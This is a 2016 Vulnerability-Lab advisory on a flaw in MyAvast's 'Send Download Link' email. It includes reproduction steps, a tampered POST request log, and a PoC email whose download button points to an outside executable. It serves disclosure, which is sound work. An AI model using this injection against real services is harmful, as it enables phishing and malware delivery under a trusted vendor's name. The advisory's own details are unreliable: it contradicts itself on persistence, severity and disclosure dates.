Lucene search

K
vulnerlabKarim Rahal [[email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]VULNERABLE:1623
HistoryApr 19, 2016 - 12:00 a.m.

AVAST #13 - Persistent Cross Site Scripting Vulnerability

2016-04-1900:00:00
Karim Rahal [[email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]
www.vulnerability-lab.com
24
Document Title:
===============
AVAST #13 - Persistent Cross Site Scripting Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1623

Video: https://www.youtube.com/watch?v=08Ux7DUIfNo


Release Date:
=============
2016-04-19


Vulnerability Laboratory ID (VL-ID):
====================================
1623


Common Vulnerability Scoring System:
====================================
3.2


Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. 
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available 
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a cross site scripting web vulnerability in the official AVAST online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-10-26: Researcher Notification & Coordination (Karim Rahal - ElitSec)
2015-10-26: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-02-03: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2015-04-10: Vendor Fix/Patch (AVAST Developer Team)
2015-04-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVAST!
Product: Online Service - Web Application 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A client-side POST inject web vulnerability has been discovered in the official AVAST MyAVAST online service web-application.
The client-side vulnerability allows remote attacker to inject script codes via POST method to compromise client-side application to browser requests.

The vulnerability is located the `Send Download Link` request, that allows an attacker finally to change stuff inside the email sent via POST method.
The bug can be exploited by tampering the `Send Download Link` request to emails. The attacker is able to interact by tampering the session via changΓ­ng 
a parameter named `payload`. The payload is the `Anchor` to the download button in the email. In the case of attack scenario we was finally able to 
change the parameter live with the `anchor`. Thus interaction bypass the filter out of the box and adds the content to the eMail for final exploitation.
The request method to inject is POST and the attack vector is located on the client-side of the online service web-application. The attack vector of the 
vulnerability is client-side and the request method to inject is POST.

The security risk of the client-side POST inject web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. 
Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of 
malicous script codes or client-side manipulation of browser to application requests.

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] MyAvast - Devices - Add

Vulnerable Parameter(s):
				[+] link to email

Affected Module(s):
				[+] Email - Download Button


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privilege web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Go to the following url ... https://myavast.com/en-us/#devices/add
2. Click the "send" button next to the "send Download" link to: (Your Email)
3. Start a session tamper for http to intercept in the next step the vulnerable parameter value
4. Change the payload":[""] and change anything inside the payload parameter, and anything you put there will be the "anchor" of the download button in the email
5. After that interaction go to your email, and click the download button and you will see the executable payload
6. Successful reproduce of the client-side POST inject web vulnerability in the avast web-application!


PoC: Exploitcode (Email)
<h2 style="font-size:24px;font-weight:300;margin:25px 0 25px;color:#666">Secure your device
		</h2>
	</td>
</tr><tr><td colspan="2" style="padding:30px 12%;" class="content" align="left" valign="top">
		<!-- text -->
		<p style="margin:0;padding:10px 0;color:#666;font-size:15px;line-height:1.3;text-align:left;">
				Thank you for choosing <b>Avast</b> for Windows.
             Just download and run the installation.
		</p>
		<!-- link to rewards -->
<a href="http://dl.4players.de/ts/releases/3.0.18.1/TeamSpeak3-Client-win64-3.0.18.1.exe[CLIENT SIDE POST INJECT VULNERABILITY!]" 
target="_blank" style="display:block;background-color:#359eb9;color:#fff;text-transform:uppercase;font-weight:bold;text-align:center;padding:15px;
font-size:20px;margin:20px 0;border-radius:3px;text-decoration:none;">
			Download
		</a>



--- PoC Session Logs [POST] ---
POST /en-us/service/single HTTP/1.1
Host: my.avast.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://my.avast.com/en-us/
Cookie: locale2=en-us; ga=GA1.2.1525308852.1441304200; ga=GA1.3.1525308852.1441304200; s_fid=2AFFF8AE00345EC4-35D71565E4ED40A3; osc_omcid=undefined; s_nr2=1445697713413-New; s_vi=[CS]v1|2B15CC53053117C1-6000011080005E70[CE]; fbm_273679106083329=base_domain=.avast.com; IDT2=IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444; fbSecThr=true; gat_UA-58120669-2=1; dc_gtm_UA-58120669-2=1; mySessionId=JKO6i46DQLL2XdFB; myLocalIdSession="IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444:1"
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 250
{"serviceName":"EmailService","operationName":"sendSecureAnotherDeviceEmail","securityToken":"c55e9113be104389812b597ada751384","correlationId":12,"payload":[http://dl.4players.de/ts/releases/3.0.18.1/TeamSpeak3-Client-win64-3.0.18.1.exe","Windows"]}
HTTP/1.1 200 OK
Server: nginx/1.7.6
Date: Mon, 26 Oct 2015 14:22:53 GMT
Content-Type: application/json
Content-Length: 153
Connection: keep-alive
Set-Cookie: mySessionId=JKO6i46DQLL2XdFB; Expires=Mon, 26 Oct 2015 14:23:53 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly
Set-Cookie: myLocalIdSession="IDTR-52950-2X7dJugbPC3fm7FWVmXXM1MxZcsWxhZC5ct35444:1"; Expires=Mon, 26 Oct 2015 14:23:53 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly
Last-Modified: Fri, 23 Oct 2015 10:53:52 GMT
Cache-Control: max-age=0, private
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block


Reference(s):
https://my.avast.com
https://my.avast.com/en-us/
https://my.avast.com/en-us/service/
https://my.avast.com/en-us/service/single


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the input to the link to download path. Filter the input and disallow special chars. 
Prevent malicious interaction by a request protection to the validation mechanism itself.


Security Risk:
==============
The security risk of the client-side POST inejct web vulnerability to the email module is estimated as medium. (CVSS 3.2)


Credits & Authors:
==================
Karim Rahal [[email protected]] - @KarimMTV [http://www.vulnerability-lab.com/show.php?user=Karim%20Rahal]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    [email protected] 	- [email protected] 				- [email protected]
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to get a ask permission.

				    Copyright Β© 2016 | Vulnerability Laboratory - [Evolution Security GmbH]β„’